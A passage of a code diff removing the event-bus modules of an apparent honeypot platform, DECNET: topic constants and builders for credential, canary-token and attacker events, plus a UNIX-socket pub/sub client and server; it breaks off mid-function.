# ``credential.reuse.detected`` fires when the correlator inserts a new
|
||||
# CredentialReuse row or grows an existing one (added decky/service/IP).
|
||||
CREDENTIAL_CAPTURED = "captured"
|
||||
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
|
||||
|
||||
# Canary-token event types (third token under ``canary``).
|
||||
#
|
||||
# canary.{token_id}.placed — orchestrator/API successfully planted a
|
||||
# canary artifact inside a decky's
|
||||
# filesystem (or persisted a passive token
|
||||
# that has no callback wiring). Lets
|
||||
# dashboards reflect baseline coverage in
|
||||
# real time without a DB poll.
|
||||
# canary.{token_id}.triggered — ``decnet canary`` worker observed a
|
||||
# callback hit (HTTP slug or DNS subdomain
|
||||
# lookup) for the token. Payload carries
|
||||
# ``src_ip``, ``user_agent``, ``request_path``
|
||||
# and any DNS qname so downstream
|
||||
# consumers (correlator, webhook fanout)
|
||||
# can attribute and forward without a
|
||||
# follow-up DB read.
|
||||
# canary.{token_id}.revoked — operator removed a token; planter unlinked
|
||||
# the file (best-effort) and the row was
|
||||
# marked ``revoked``. Subscribers may
|
||||
# evict cached lookups by token id.
|
||||
CANARY_PLACED = "placed"
|
||||
CANARY_TRIGGERED = "triggered"
|
||||
CANARY_REVOKED = "revoked"
|
||||
|
||||
# Orchestrator event types (second token under ``orchestrator``). The
|
||||
# orchestrator worker publishes one of these per synthetic action it
|
||||
# drives against a decky — cheap inter-decky traffic and filesystem
|
||||
# mutations whose role is to keep the honeypot from looking suspiciously
|
||||
# static. Always nested with the destination decky uuid as the third
|
||||
# token, so consumers can subscribe to a single decky's life-injection
|
||||
# stream via ``orchestrator.*.<decky_uuid>``.
|
||||
ORCHESTRATOR_TRAFFIC = "traffic"
|
||||
ORCHESTRATOR_FILE = "file"
|
||||
# Emailgen — published by the ``decnet emailgen`` worker once per generated
|
||||
# fake email delivered into a mail decky's maildir. Third token is the
|
||||
# destination mail-decky uuid (the IMAP/POP3 host serving the mailbox),
|
||||
# matching the ``orchestrator.*.<decky_uuid>`` subscription pattern.
|
||||
ORCHESTRATOR_EMAIL = "email"
|
||||
|
||||
# System event types.
|
||||
SYSTEM_LOG = "log"
|
||||
SYSTEM_BUS_HEALTH = "bus.health"
|
||||
# Worker-health leaf — built per-worker as ``system.<worker>.health`` via
|
||||
# :func:`system_health`. The leaf constant stays the same across workers;
|
||||
# the worker name goes in the middle token.
|
||||
SYSTEM_HEALTH = "health"
|
||||
# Worker-control leaf — built per-worker as ``system.<worker>.control`` via
|
||||
# :func:`system_control`. Admin-originated stop intents travel on this
|
||||
# topic; each worker subscribes to its own.
|
||||
SYSTEM_CONTROL = "control"
|
||||
|
||||
# Control payload ``action`` values — the wire vocabulary. Only ``stop`` is
|
||||
# handled in v1; ``start`` is reserved because a stopped worker has no
|
||||
# subscriber, so starting requires external supervision (systemd).
|
||||
WORKER_CONTROL_STOP = "stop"
|
||||
WORKER_CONTROL_START = "start"
|
||||
|
||||
# Webhook subscription-set changed — published by the CRUD router after any
|
||||
# create / update / delete on WebhookSubscription so the webhook worker can
|
||||
# reload its in-memory subscription list and re-subscribe to the new union
|
||||
# of patterns. Payload is currently empty; consumers only need the signal.
|
||||
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
|
||||
|
||||
|
||||
# ─── Builders ────────────────────────────────────────────────────────────────
|
||||
|
||||
def topology_mutation(topology_id: str, state: str) -> str:
|
||||
"""Build ``topology.<id>.mutation.<state>``.
|
||||
|
||||
*state* should be one of the ``MUTATION_*`` constants.
|
||||
"""
|
||||
_reject_tokens(topology_id, state)
|
||||
return f"{TOPOLOGY}.{topology_id}.mutation.{state}"
|
||||
|
||||
|
||||
def topology_status(topology_id: str) -> str:
|
||||
"""Build ``topology.<id>.status``."""
|
||||
_reject_tokens(topology_id)
|
||||
return f"{TOPOLOGY}.{topology_id}.{TOPOLOGY_STATUS}"
|
||||
|
||||
|
||||
def decky(decky_id: str, event_type: str) -> str:
|
||||
"""Build ``decky.<id>.<event_type>``.
|
||||
|
||||
*event_type* is typically one of ``DECKY_STATE`` or ``DECKY_TRAFFIC``.
|
||||
"""
|
||||
_reject_tokens(decky_id, event_type)
|
||||
return f"{DECKY}.{decky_id}.{event_type}"
|
||||
|
||||
|
||||
def decky_mutation(decky_id: str) -> str:
|
||||
"""Build ``decky.<id>.mutation``."""
|
||||
_reject_tokens(decky_id)
|
||||
return f"{DECKY}.{decky_id}.{DECKY_MUTATION}"
|
||||
|
||||
|
||||
def system(event_type: str) -> str:
|
||||
"""Build ``system.<event_type>``.
|
||||
|
||||
*event_type* may itself contain dots (e.g. ``bus.health``) — we don't
|
||||
re-validate the already-constant leaves; this just prefixes.
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("system topic requires a non-empty event_type")
|
||||
return f"{SYSTEM}.{event_type}"
|
||||
|
||||
|
||||
def credential(event_type: str) -> str:
|
||||
"""Build ``credential.<event_type>``.
|
||||
|
||||
*event_type* is typically one of :data:`CREDENTIAL_CAPTURED` or
|
||||
:data:`CREDENTIAL_REUSE_DETECTED`. Dotted leaves
|
||||
(``reuse.detected``) are permitted — same rationale as
|
||||
:func:`system`.
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("credential topic requires a non-empty event_type")
|
||||
return f"{CREDENTIAL}.{event_type}"
|
||||
|
||||
|
||||
def attacker(event_type: str) -> str:
|
||||
"""Build ``attacker.<event_type>``.
|
||||
|
||||
*event_type* is typically one of ``ATTACKER_OBSERVED``,
|
||||
``ATTACKER_SCORED``, ``ATTACKER_SESSION_STARTED``,
|
||||
``ATTACKER_SESSION_ENDED``. Dotted leaves (``session.started``) are
|
||||
permitted — same rationale as :func:`system`.
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("attacker topic requires a non-empty event_type")
|
||||
return f"{ATTACKER}.{event_type}"
|
||||
|
||||
|
||||
def campaign(event_type: str) -> str:
|
||||
"""Build ``campaign.<event_type>``.
|
||||
|
||||
*event_type* is typically one of :data:`CAMPAIGN_FORMED`,
|
||||
:data:`CAMPAIGN_IDENTITY_ASSIGNED`, :data:`CAMPAIGN_MERGED`, or
|
||||
:data:`CAMPAIGN_UNMERGED`. Dotted leaves (``identity.assigned``)
|
||||
are permitted — same rationale as :func:`system`.
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("campaign topic requires a non-empty event_type")
|
||||
return f"{CAMPAIGN}.{event_type}"
|
||||
|
||||
|
||||
def identity(event_type: str) -> str:
|
||||
"""Build ``identity.<event_type>``.
|
||||
|
||||
*event_type* is typically one of :data:`IDENTITY_FORMED`,
|
||||
:data:`IDENTITY_OBSERVATION_LINKED`, :data:`IDENTITY_MERGED`, or
|
||||
:data:`IDENTITY_UNMERGED`. Dotted leaves (``observation.linked``)
|
||||
are permitted — same rationale as :func:`system`.
|
||||
"""
|
||||
if not event_type:
|
||||
raise ValueError("identity topic requires a non-empty event_type")
|
||||
return f"{IDENTITY}.{event_type}"
|
||||
|
||||
|
||||
def orchestrator(event_type: str, decky_id: str) -> str:
|
||||
"""Build ``orchestrator.<event_type>.<decky_id>``.
|
||||
|
||||
*event_type* should be one of :data:`ORCHESTRATOR_TRAFFIC` or
|
||||
:data:`ORCHESTRATOR_FILE`. The destination decky is always the
|
||||
third token so per-decky subscribers can use
|
||||
``orchestrator.*.<decky_uuid>``.
|
||||
"""
|
||||
_reject_tokens(event_type, decky_id)
|
||||
return f"{ORCHESTRATOR}.{event_type}.{decky_id}"
|
||||
|
||||
|
||||
def canary(token_id: str, event_type: str) -> str:
|
||||
"""Build ``canary.<token_id>.<event_type>``.
|
||||
|
||||
*event_type* should be one of :data:`CANARY_PLACED`,
|
||||
:data:`CANARY_TRIGGERED`, or :data:`CANARY_REVOKED`. The token id
|
||||
is always the second token so per-token subscribers can use
|
||||
``canary.<token_id>.>`` and fleet-wide consumers (webhook fanout,
|
||||
correlator) use ``canary.>``.
|
||||
"""
|
||||
_reject_tokens(token_id, event_type)
|
||||
return f"{CANARY}.{token_id}.{event_type}"
|
||||
|
||||
|
||||
def system_health(worker: str) -> str:
|
||||
"""Build ``system.<worker>.health``.
|
||||
|
||||
Worker-health heartbeats live as a nested leaf under ``system`` so
|
||||
consumers can subscribe to ``system.*.health`` for every worker at
|
||||
once, or to ``system.mutator.health`` for a single one. *worker* is
|
||||
validated as a regular segment — no dots, wildcards, or whitespace.
|
||||
"""
|
||||
_reject_tokens(worker)
|
||||
return f"{SYSTEM}.{worker}.{SYSTEM_HEALTH}"
|
||||
|
||||
|
||||
def system_control(worker: str) -> str:
|
||||
"""Build ``system.<worker>.control``.
|
||||
|
||||
Admin-originated stop (and, eventually, start) intents are published
|
||||
here; the worker in question subscribes to its own address and reacts.
|
||||
Payload shape::
|
||||
|
||||
{"action": "stop", "requested_by": "<username>", "ts": <unix>}
|
||||
|
||||
*action* must be one of :data:`WORKER_CONTROL_STOP` /
|
||||
:data:`WORKER_CONTROL_START`; any other value is ignored by the
|
||||
listener. Same segment rules as :func:`system_health`.
|
||||
"""
|
||||
_reject_tokens(worker)
|
||||
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
||||
|
||||
|
||||
def _reject_tokens(*parts: str) -> None:
|
||||
"""Reject topic segments that would break NATS-style tokenization.
|
||||
|
||||
Dots, wildcards, whitespace, and empty strings in a *segment* would
|
||||
silently corrupt the hierarchy (e.g. ``topology.a.b.status`` for a
|
||||
``topology_id`` of ``"a.b"``). Raise early at the builder instead of
|
||||
shipping a malformed topic to the wire.
|
||||
"""
|
||||
for p in parts:
|
||||
if not p:
|
||||
raise ValueError("topic segment must not be empty")
|
||||
if "." in p or "*" in p or ">" in p or any(c.isspace() for c in p):
|
||||
raise ValueError(
|
||||
f"topic segment {p!r} may not contain '.', '*', '>', or whitespace"
|
||||
)
|
||||
@@ -1,257 +0,0 @@
|
||||
"""UNIX-socket client — :class:`UnixSocketBus` implementation of :class:`BaseBus`.
|
||||
|
||||
Holds one open socket to the local :class:`~decnet.bus.unix_server.BusServer`.
|
||||
Operations:
|
||||
|
||||
* :meth:`publish` writes a single ``PUB`` frame and returns; no ack.
|
||||
* :meth:`subscribe` writes a ``SUB`` frame and returns a
|
||||
:class:`~decnet.bus.base.Subscription` backed by an :class:`asyncio.Queue`
|
||||
that the background reader task feeds.
|
||||
|
||||
One background reader task per bus instance dispatches incoming ``EVT``
|
||||
frames to every registered subscription whose pattern matches the topic.
|
||||
On connection drop or close, every subscription is woken via a sentinel so
|
||||
iterators unblock cleanly; callers see :class:`StopAsyncIteration` from the
|
||||
``async for`` loop.
|
||||
|
||||
No auto-reconnect in MVP. If the server restarts, callers must
|
||||
:meth:`close` the bus and construct a new one. This mirrors how other
|
||||
DECNET workers handle their dependencies — the systemd ``Restart=on-failure``
|
||||
supervision above us is the retry loop.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import os
|
||||
import pathlib
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus import protocol
|
||||
from decnet.bus.base import (
|
||||
BaseBus,
|
||||
Event,
|
||||
Subscription,
|
||||
_CLOSE_SENTINEL,
|
||||
matches,
|
||||
)
|
||||
from decnet.bus.fake import _enqueue_drop_oldest as _enqueue_event_drop_oldest
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.client")
|
||||
|
||||
_INBOUND_QUEUE_SIZE = 1024
|
||||
|
||||
|
||||
class _UnixSubscription(Subscription):
|
||||
def __init__(
|
||||
self,
|
||||
bus: "UnixSocketBus",
|
||||
pattern: str,
|
||||
queue: "asyncio.Queue[Any]",
|
||||
) -> None:
|
||||
super().__init__(pattern)
|
||||
self._bus = bus
|
||||
self._queue = queue
|
||||
|
||||
async def __anext__(self) -> Event:
|
||||
if self._closed:
|
||||
raise StopAsyncIteration
|
||||
item = await self._queue.get()
|
||||
if item is _CLOSE_SENTINEL:
|
||||
raise StopAsyncIteration
|
||||
return item
|
||||
|
||||
async def _aclose(self) -> None:
|
||||
await self._bus._unregister(self)
|
||||
try:
|
||||
self._queue.put_nowait(_CLOSE_SENTINEL)
|
||||
except asyncio.QueueFull:
|
||||
pass
|
||||
|
||||
|
||||
class UnixSocketBus(BaseBus):
|
||||
"""Client handle for a local :class:`BusServer`.
|
||||
|
||||
One instance per process typically; multiple instances simply open
|
||||
multiple sockets to the same server. Connection is lazy — the first
|
||||
:meth:`connect` (or any publish/subscribe call via ``async with``)
|
||||
opens the socket.
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
socket_path: pathlib.Path | str,
|
||||
*,
|
||||
client_name: str | None = None,
|
||||
) -> None:
|
||||
self._path = pathlib.Path(socket_path)
|
||||
self._client_name = client_name or f"decnet-bus-client[{os.getpid()}]"
|
||||
self._reader: asyncio.StreamReader | None = None
|
||||
self._writer: asyncio.StreamWriter | None = None
|
||||
self._reader_task: asyncio.Task[None] | None = None
|
||||
self._subs: list[_UnixSubscription] = []
|
||||
self._lock = asyncio.Lock()
|
||||
self._write_lock = asyncio.Lock()
|
||||
self._closed = False
|
||||
# Sticky flag: the first publish-on-closed-bus call logs at
|
||||
# WARNING so operators see that a publish was dropped; subsequent
|
||||
# calls on the same instance log at DEBUG only to prevent a
|
||||
# log flood when stream threads drain after close. The bus is
|
||||
# critical infra, so the first warning is non-negotiable.
|
||||
self._closed_publish_warned = False
|
||||
|
||||
# ─── Lifecycle ──────────────────────────────────────────────────────────
|
||||
|
||||
async def connect(self) -> None:
|
||||
if self._writer is not None:
|
||||
return
|
||||
if self._closed:
|
||||
raise RuntimeError("connect on closed bus")
|
||||
self._reader, self._writer = await asyncio.open_unix_connection(str(self._path))
|
||||
await self._send(protocol.encode(protocol.HELLO, args=self._client_name))
|
||||
self._reader_task = asyncio.create_task(self._reader_loop())
|
||||
log.debug("bus.client: connected to %s as %s", self._path, self._client_name)
|
||||
|
||||
async def close(self) -> None:
|
||||
if self._closed:
|
||||
return
|
||||
self._closed = True
|
||||
|
||||
# Best-effort BYE — we don't care if it fails.
|
||||
if self._writer is not None and not self._writer.is_closing():
|
||||
with contextlib.suppress(Exception):
|
||||
await self._send(protocol.encode(protocol.BYE))
|
||||
|
||||
if self._reader_task is not None:
|
||||
self._reader_task.cancel()
|
||||
with contextlib.suppress(asyncio.CancelledError):
|
||||
await self._reader_task
|
||||
self._reader_task = None
|
||||
|
||||
if self._writer is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
self._writer.close()
|
||||
await self._writer.wait_closed()
|
||||
self._writer = None
|
||||
self._reader = None
|
||||
|
||||
# Wake every subscription so `async for` exits.
|
||||
for sub in list(self._subs):
|
||||
with contextlib.suppress(asyncio.QueueFull):
|
||||
sub._queue.put_nowait(_CLOSE_SENTINEL)
|
||||
self._subs.clear()
|
||||
|
||||
# ─── Pub/Sub ────────────────────────────────────────────────────────────
|
||||
|
||||
async def publish(
|
||||
self,
|
||||
topic: str,
|
||||
payload: dict[str, Any],
|
||||
*,
|
||||
event_type: str = "",
|
||||
) -> None:
|
||||
if self._closed:
|
||||
# Degrade gracefully: the DB is the source of truth, the bus
|
||||
# is only the notification layer. Raising here made every
|
||||
# caller via publish_safely flood the logs once per stream
|
||||
# line during shutdown races. First drop warns loudly;
|
||||
# subsequent drops on the same instance are DEBUG-only.
|
||||
if not self._closed_publish_warned:
|
||||
self._closed_publish_warned = True
|
||||
log.warning(
|
||||
"bus.client: publish on closed bus dropped topic=%s "
|
||||
"(further drops on this instance logged at DEBUG)",
|
||||
topic,
|
||||
)
|
||||
else:
|
||||
log.debug("bus.client: publish on closed bus dropped topic=%s", topic)
|
||||
return
|
||||
if self._writer is None:
|
||||
await self.connect()
|
||||
body = Event(topic=topic, payload=payload, type=event_type).to_dict()
|
||||
try:
|
||||
await self._send(protocol.encode(protocol.PUB, args=topic, body=body))
|
||||
except (ConnectionError, BrokenPipeError) as exc:
|
||||
# Bus loss is a logged warning, never a publisher crash. The
|
||||
# DB-as-source-of-truth invariant means the work is already
|
||||
# persisted; the missing event is just a missed notification.
|
||||
log.warning("bus.client: publish failed: %s", exc)
|
||||
|
||||
def subscribe(self, pattern: str) -> Subscription:
|
||||
if self._closed:
|
||||
raise RuntimeError("subscribe on closed bus")
|
||||
queue: asyncio.Queue[Any] = asyncio.Queue(maxsize=_INBOUND_QUEUE_SIZE)
|
||||
sub = _UnixSubscription(self, pattern, queue)
|
||||
self._subs.append(sub)
|
||||
# Schedule the SUB frame asynchronously so subscribe() stays sync,
|
||||
# matching the BaseBus signature. The caller will shortly `async
|
||||
# with` / `async for` the subscription, which will run the event
|
||||
# loop and pick this task up.
|
||||
asyncio.ensure_future(self._send_sub(pattern))
|
||||
return sub
|
||||
|
||||
async def _send_sub(self, pattern: str) -> None:
|
||||
try:
|
||||
if self._writer is None:
|
||||
await self.connect()
|
||||
await self._send(protocol.encode(protocol.SUB, args=pattern))
|
||||
except Exception as exc: # pragma: no cover - network paths in live tests
|
||||
log.warning("bus.client: SUB %s failed: %s", pattern, exc)
|
||||
|
||||
async def _unregister(self, sub: _UnixSubscription) -> None:
|
||||
try:
|
||||
self._subs.remove(sub)
|
||||
except ValueError:
|
||||
return
|
||||
# Tell the server we no longer want events for this pattern if no
|
||||
# other local subscription still wants it.
|
||||
if not any(s.pattern == sub.pattern for s in self._subs):
|
||||
with contextlib.suppress(Exception):
|
||||
await self._send(protocol.encode(protocol.UNSUB, args=sub.pattern))
|
||||
|
||||
# ─── Internal I/O ───────────────────────────────────────────────────────
|
||||
|
||||
async def _send(self, frame_bytes: bytes) -> None:
|
||||
if self._writer is None:
|
||||
raise ConnectionError("bus.client: not connected")
|
||||
async with self._write_lock:
|
||||
self._writer.write(frame_bytes)
|
||||
await self._writer.drain()
|
||||
|
||||
async def _reader_loop(self) -> None:
|
||||
if self._reader is None:
|
||||
return
|
||||
try:
|
||||
while True:
|
||||
frame = await protocol.read_frame(self._reader)
|
||||
if frame is None:
|
||||
break
|
||||
if frame.verb != protocol.EVT:
|
||||
# Clients only ever legitimately receive EVT (or BYE).
|
||||
if frame.verb == protocol.BYE:
|
||||
break
|
||||
log.warning("bus.client: unexpected verb from server: %s", frame.verb)
|
||||
continue
|
||||
topic = frame.args
|
||||
data = protocol.decode_body(frame.body) if frame.body else {}
|
||||
event = Event.from_dict(topic, data)
|
||||
self._dispatch(event)
|
||||
except protocol.ProtocolError as exc:
|
||||
log.warning("bus.client: protocol error: %s", exc)
|
||||
except (asyncio.IncompleteReadError, ConnectionError):
|
||||
pass
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception: # pragma: no cover
|
||||
log.exception("bus.client: reader loop crashed")
|
||||
finally:
|
||||
# Server-side close — wake every subscription.
|
||||
for sub in list(self._subs):
|
||||
with contextlib.suppress(asyncio.QueueFull):
|
||||
sub._queue.put_nowait(_CLOSE_SENTINEL)
|
||||
|
||||
def _dispatch(self, event: Event) -> None:
|
||||
for sub in self._subs:
|
||||
if matches(sub.pattern, event.topic):
|
||||
_enqueue_event_drop_oldest(sub._queue, event)
|
||||
@@ -1,309 +0,0 @@
|
||||
"""UNIX-socket server for the DECNET bus.
|
||||
|
||||
One :class:`BusServer` per host. Accepts local connections on a UNIX-domain
|
||||
socket; each connection may:
|
||||
|
||||
* publish events (``PUB`` frames) that the server fans out to all matching
|
||||
subscribers on other connections, and
|
||||
* subscribe to patterns (``SUB`` frames) and receive matching events as
|
||||
``EVT`` frames.
|
||||
|
||||
Authorization is socket file permissions (0660, group=``decnet`` if that
|
||||
POSIX group exists, else the server process's own group). Anything the
|
||||
kernel lets ``connect()`` is trusted — there is no verb-level auth. This
|
||||
matches the "local processes on the same host" threat model; cross-host
|
||||
federation is out of scope (see DEBT-029).
|
||||
|
||||
Backpressure is per-connection, drop-oldest: if a subscriber can't drain its
|
||||
outbound queue fast enough, the server discards the oldest pending event
|
||||
rather than blocking publishers. The bus is at-most-once by contract, so
|
||||
drops are acceptable; stalled publishers are not.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import grp
|
||||
import os
|
||||
import pathlib
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus import protocol
|
||||
from decnet.bus.base import Event, matches
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.server")
|
||||
|
||||
_SOCKET_MODE = 0o660
|
||||
_DEFAULT_GROUP = "decnet"
|
||||
_OUTBOUND_QUEUE_SIZE = 1024
|
||||
|
||||
|
||||
@dataclass(eq=False)
|
||||
class _Connection:
|
||||
"""Per-connection server state."""
|
||||
|
||||
writer: asyncio.StreamWriter
|
||||
peer_name: str = "<unknown>"
|
||||
patterns: set[str] = field(default_factory=set)
|
||||
outbound: asyncio.Queue[bytes] = field(
|
||||
default_factory=lambda: asyncio.Queue(maxsize=_OUTBOUND_QUEUE_SIZE)
|
||||
)
|
||||
closed: bool = False
|
||||
|
||||
|
||||
class BusServer:
|
||||
"""Serve a UNIX-socket bus on *socket_path*.
|
||||
|
||||
Lifecycle: construct → :meth:`start` → :meth:`serve_forever` (or rely
|
||||
on :meth:`start` returning once bound) → :meth:`close` for teardown.
|
||||
Safe to :meth:`close` multiple times.
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
socket_path: pathlib.Path | str,
|
||||
*,
|
||||
group: str | None = _DEFAULT_GROUP,
|
||||
mode: int = _SOCKET_MODE,
|
||||
) -> None:
|
||||
self._path = pathlib.Path(socket_path)
|
||||
self._group = group
|
||||
self._mode = mode
|
||||
self._server: asyncio.base_events.Server | None = None
|
||||
self._connections: set[_Connection] = set()
|
||||
self._closed = False
|
||||
|
||||
# ─── Lifecycle ──────────────────────────────────────────────────────────
|
||||
|
||||
async def start(self) -> None:
|
||||
"""Bind the socket and begin accepting connections.
|
||||
|
||||
Removes any stale socket file at *socket_path* first (common case:
|
||||
the previous worker crashed without cleaning up). The parent
|
||||
directory must already exist; we do NOT create it blindly because
|
||||
the chosen directory (typically ``/run/decnet``) may require
|
||||
systemd ``RuntimeDirectory=`` to set up.
|
||||
"""
|
||||
if self._server is not None:
|
||||
return
|
||||
|
||||
parent = self._path.parent
|
||||
if not parent.exists():
|
||||
raise FileNotFoundError(
|
||||
f"bus socket parent directory {parent} does not exist; "
|
||||
f"create it with systemd RuntimeDirectory= or mkdir"
|
||||
)
|
||||
|
||||
# Clean up a stale socket from a previous crash. If a live server
|
||||
# is actually listening there, ``bind()`` below will fail — we do
|
||||
# not try to detect live vs. stale ourselves.
|
||||
with contextlib.suppress(FileNotFoundError):
|
||||
if self._path.is_socket():
|
||||
self._path.unlink()
|
||||
|
||||
self._server = await asyncio.start_unix_server(
|
||||
self._handle_connection, path=str(self._path),
|
||||
)
|
||||
_chmod_and_chown(self._path, self._mode, self._group)
|
||||
log.info("bus.server: listening on %s (mode=%o group=%s)",
|
||||
self._path, self._mode, self._group or "<inherit>")
|
||||
|
||||
async def serve_forever(self) -> None:
|
||||
if self._server is None:
|
||||
raise RuntimeError("BusServer not started")
|
||||
async with self._server:
|
||||
await self._server.serve_forever()
|
||||
|
||||
async def close(self) -> None:
|
||||
if self._closed:
|
||||
return
|
||||
self._closed = True
|
||||
|
||||
if self._server is not None:
|
||||
self._server.close()
|
||||
with contextlib.suppress(Exception):
|
||||
await self._server.wait_closed()
|
||||
self._server = None
|
||||
|
||||
# Drain every live connection.
|
||||
for conn in list(self._connections):
|
||||
await self._close_connection(conn)
|
||||
self._connections.clear()
|
||||
|
||||
with contextlib.suppress(FileNotFoundError):
|
||||
self._path.unlink()
|
||||
log.info("bus.server: closed")
|
||||
|
||||
# ─── Internal publish fan-out ───────────────────────────────────────────
|
||||
|
||||
async def publish(self, topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
||||
"""Server-side publish helper — used by the worker to emit
|
||||
``system.bus.health`` heartbeats without opening a client loop."""
|
||||
event = Event(topic=topic, payload=payload, type=event_type)
|
||||
self._fanout(event)
|
||||
|
||||
# ─── Connection handler ─────────────────────────────────────────────────
|
||||
|
||||
async def _handle_connection(
|
||||
self,
|
||||
reader: asyncio.StreamReader,
|
||||
writer: asyncio.StreamWriter,
|
||||
) -> None:
|
||||
conn = _Connection(writer=writer)
|
||||
self._connections.add(conn)
|
||||
writer_task = asyncio.create_task(self._writer_loop(conn))
|
||||
try:
|
||||
await self._reader_loop(conn, reader)
|
||||
except protocol.ProtocolError as exc:
|
||||
log.warning("bus.server: protocol error from %s: %s", conn.peer_name, exc)
|
||||
except (asyncio.IncompleteReadError, ConnectionError) as exc:
|
||||
log.debug("bus.server: %s disconnected: %s", conn.peer_name, exc)
|
||||
except Exception: # pragma: no cover - defensive
|
||||
log.exception("bus.server: unhandled error in connection")
|
||||
finally:
|
||||
await self._close_connection(conn)
|
||||
self._connections.discard(conn)
|
||||
writer_task.cancel()
|
||||
with contextlib.suppress(asyncio.CancelledError):
|
||||
await writer_task
|
||||
|
||||
async def _reader_loop(
|
||||
self, conn: _Connection, reader: asyncio.StreamReader,
|
||||
) -> None:
|
||||
while True:
|
||||
frame = await protocol.read_frame(reader)
|
||||
if frame is None:
|
||||
return
|
||||
await self._dispatch(conn, frame)
|
||||
if frame.verb == protocol.BYE:
|
||||
return
|
||||
|
||||
async def _dispatch(self, conn: _Connection, frame: protocol.Frame) -> None:
|
||||
if frame.verb == protocol.HELLO:
|
||||
conn.peer_name = frame.args or conn.peer_name
|
||||
log.debug("bus.server: HELLO from %s", conn.peer_name)
|
||||
return
|
||||
if frame.verb == protocol.SUB:
|
||||
pattern = frame.args
|
||||
if not pattern:
|
||||
raise protocol.ProtocolError("SUB requires a pattern")
|
||||
conn.patterns.add(pattern)
|
||||
log.debug("bus.server: %s SUB %s", conn.peer_name, pattern)
|
||||
return
|
||||
if frame.verb == protocol.UNSUB:
|
||||
conn.patterns.discard(frame.args)
|
||||
return
|
||||
if frame.verb == protocol.PUB:
|
||||
topic = frame.args
|
||||
if not topic:
|
||||
raise protocol.ProtocolError("PUB requires a topic")
|
||||
data = protocol.decode_body(frame.body) if frame.body else {}
|
||||
event = Event(
|
||||
topic=topic,
|
||||
payload=data.get("payload", {}) or {},
|
||||
type=data.get("type", "") or "",
|
||||
)
|
||||
self._fanout(event, origin=conn)
|
||||
return
|
||||
if frame.verb == protocol.BYE:
|
||||
return
|
||||
# EVT is server-to-client only; receiving one is a protocol violation.
|
||||
raise protocol.ProtocolError(f"unexpected verb {frame.verb!r} from client")
|
||||
|
||||
def _fanout(self, event: Event, *, origin: _Connection | None = None) -> None:
|
||||
"""Enqueue *event* as an EVT frame on every matching connection.
|
||||
|
||||
We do NOT deliver back to the originating connection (a publisher
|
||||
does not receive its own event). Encoding happens once per event,
|
||||
not once per subscriber.
|
||||
"""
|
||||
try:
|
||||
frame_bytes = protocol.encode(
|
||||
protocol.EVT, args=event.topic, body=event.to_dict(),
|
||||
)
|
||||
except protocol.ProtocolError:
|
||||
log.exception("bus.server: failed to encode EVT for topic=%s", event.topic)
|
||||
return
|
||||
|
||||
for conn in self._connections:
|
||||
if conn is origin or conn.closed:
|
||||
continue
|
||||
if not any(matches(p, event.topic) for p in conn.patterns):
|
||||
continue
|
||||
_enqueue_drop_oldest(conn.outbound, frame_bytes, event.topic)
|
||||
|
||||
async def _writer_loop(self, conn: _Connection) -> None:
|
||||
"""Serialize writes onto *conn*'s socket.
|
||||
|
||||
One writer task per connection so a slow peer only blocks its own
|
||||
queue, not the fan-out loop. The queue is bounded with drop-oldest
|
||||
policy applied at enqueue time (see :func:`_enqueue_drop_oldest`).
|
||||
"""
|
||||
try:
|
||||
while not conn.closed:
|
||||
data = await conn.outbound.get()
|
||||
conn.writer.write(data)
|
||||
await conn.writer.drain()
|
||||
except (ConnectionError, BrokenPipeError):
|
||||
log.debug("bus.server: %s writer: peer closed", conn.peer_name)
|
||||
except asyncio.CancelledError:
|
||||
pass
|
||||
except Exception: # pragma: no cover - defensive
|
||||
log.exception("bus.server: writer loop crashed for %s", conn.peer_name)
|
||||
|
||||
async def _close_connection(self, conn: _Connection) -> None:
|
||||
if conn.closed:
|
||||
return
|
||||
conn.closed = True
|
||||
with contextlib.suppress(Exception):
|
||||
conn.writer.close()
|
||||
await conn.writer.wait_closed()
|
||||
|
||||
|
||||
# ─── Helpers ─────────────────────────────────────────────────────────────────
|
||||
|
||||
def _chmod_and_chown(path: pathlib.Path, mode: int, group: str | None) -> None:
|
||||
"""Apply socket file perms and best-effort group ownership.
|
||||
|
||||
If *group* is ``None`` or the named group does not exist, we leave the
|
||||
socket owned by the current process group. This keeps the server
|
||||
usable on dev boxes that don't have a ``decnet`` group set up.
|
||||
"""
|
||||
try:
|
||||
os.chmod(path, mode)
|
||||
except OSError as exc:
|
||||
log.warning("bus.server: chmod(%s, %o) failed: %s", path, mode, exc)
|
||||
|
||||
if not group:
|
||||
return
|
||||
try:
|
||||
gid = grp.getgrnam(group).gr_gid
|
||||
except KeyError:
|
||||
log.debug("bus.server: group %r not found, leaving socket group unchanged", group)
|
||||
return
|
||||
try:
|
||||
os.chown(path, -1, gid)
|
||||
except PermissionError:
|
||||
# Dev box running as an unprivileged user can't chown. Log once at
|
||||
# debug and move on — the socket is still usable by the owner.
|
||||
log.debug("bus.server: chown(%s, gid=%d) denied; leaving as-is", path, gid)
|
||||
except OSError as exc:
|
||||
log.warning("bus.server: chown(%s, gid=%d) failed: %s", path, gid, exc)
|
||||
|
||||
|
||||
def _enqueue_drop_oldest(
|
||||
queue: "asyncio.Queue[bytes]", data: bytes, topic: str,
|
||||
) -> None:
|
||||
"""Drop-oldest backpressure — mirrors :func:`decnet.bus.fake._enqueue_drop_oldest`."""
|
||||
while True:
|
||||
try:
|
